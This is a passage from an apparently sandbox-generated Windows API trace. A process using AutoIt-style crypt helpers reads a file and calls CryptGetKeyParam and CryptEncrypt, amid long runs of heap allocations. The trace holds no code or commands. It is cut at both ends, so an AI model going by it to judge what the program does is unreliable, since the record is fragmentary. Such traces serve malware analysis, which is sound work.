nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x8473, lpOverlapped=0x0) returned 1 [0120.113] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0120.115] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0120.115] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0120.116] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0120.116] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.116] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0120.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0120.116] CryptGetKeyParam (in: hKey=0x41ac600, dwParam=0x7, pbData=0x43e2860, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2860*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0120.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0120.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea490 [0120.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0120.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0120.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0120.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0120.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0120.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0120.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0120.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0120.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0120.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0120.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0120.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0120.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0120.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0120.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0120.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0120.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0120.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0120.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0120.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0120.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0120.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0120.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0120.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0120.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0120.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0120.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0120.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0120.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0120.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0120.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0120.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0120.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0120.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0120.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0120.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8ab0 [0120.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0120.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0120.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0120.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0120.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0120.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0120.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0120.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0120.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9350 [0120.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0120.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0120.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0120.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0120.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0120.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0120.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0120.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0120.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0120.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0120.118] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0120.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0120.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0120.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0120.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0120.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0120.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0120.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0120.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0120.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0120.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0120.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0120.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9578 [0120.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0120.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0120.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0120.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0120.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0120.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0120.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0120.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0120.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0120.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0120.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0120.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0120.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0120.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0120.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0120.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0120.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0120.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0120.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0120.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0120.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0120.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0120.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0120.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0120.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0120.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0120.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0120.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0120.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0120.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0120.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0120.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0120.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0120.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0120.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0120.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0120.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0120.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0120.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0120.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0120.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0120.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0120.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0120.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0120.120] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0120.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca808 [0120.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0120.120] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0120.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0120.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0120.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923b0 [0120.120] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0120.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca928 [0120.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0120.121] PeekMessageW (in: lpMsg=0x144e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e734) returned 0 [0120.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0120.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0120.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0120.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0120.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0120.121] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0120.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0120.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392298 [0120.121] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0120.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca928 [0120.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0120.121] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0120.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0120.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0120.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0120.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0120.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0120.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8f00 [0120.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0120.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0120.121] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0120.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0120.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0120.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0120.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0120.121] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0120.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0120.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0120.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0120.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0120.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0120.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923b0 [0120.122] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8e0 [0120.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0120.122] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0120.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0120.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0120.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0120.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0120.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0120.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0120.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0120.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0120.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0120.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0120.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0120.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0120.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0120.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0120.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0120.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0120.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0120.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0120.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0120.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0120.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0120.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0120.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0120.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0120.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0120.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0120.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0120.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0120.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0120.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0120.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0120.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0120.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0120.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0120.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0120.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0120.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0120.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0120.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0120.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0120.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0120.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0120.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0120.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8473) returned 0x452ed90 [0120.124] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0120.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0120.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0120.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0120.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0120.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cabf8 [0120.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cabf8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0120.124] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x8473, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x8480) returned 1 [0120.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0120.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8ab0 [0120.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0120.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0120.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0120.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0120.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0120.138] CharLowerBuffW (in: lpsz="byte[33921]", cchLength=0xb | out: lpsz="byte[33921]") returned 0xb [0120.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0120.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0120.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0120.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0120.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0120.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0120.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0120.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0120.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0120.138] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.139] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0120.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0120.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0120.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0120.139] WideCharToMultiByte (in: CodePage=0x0, 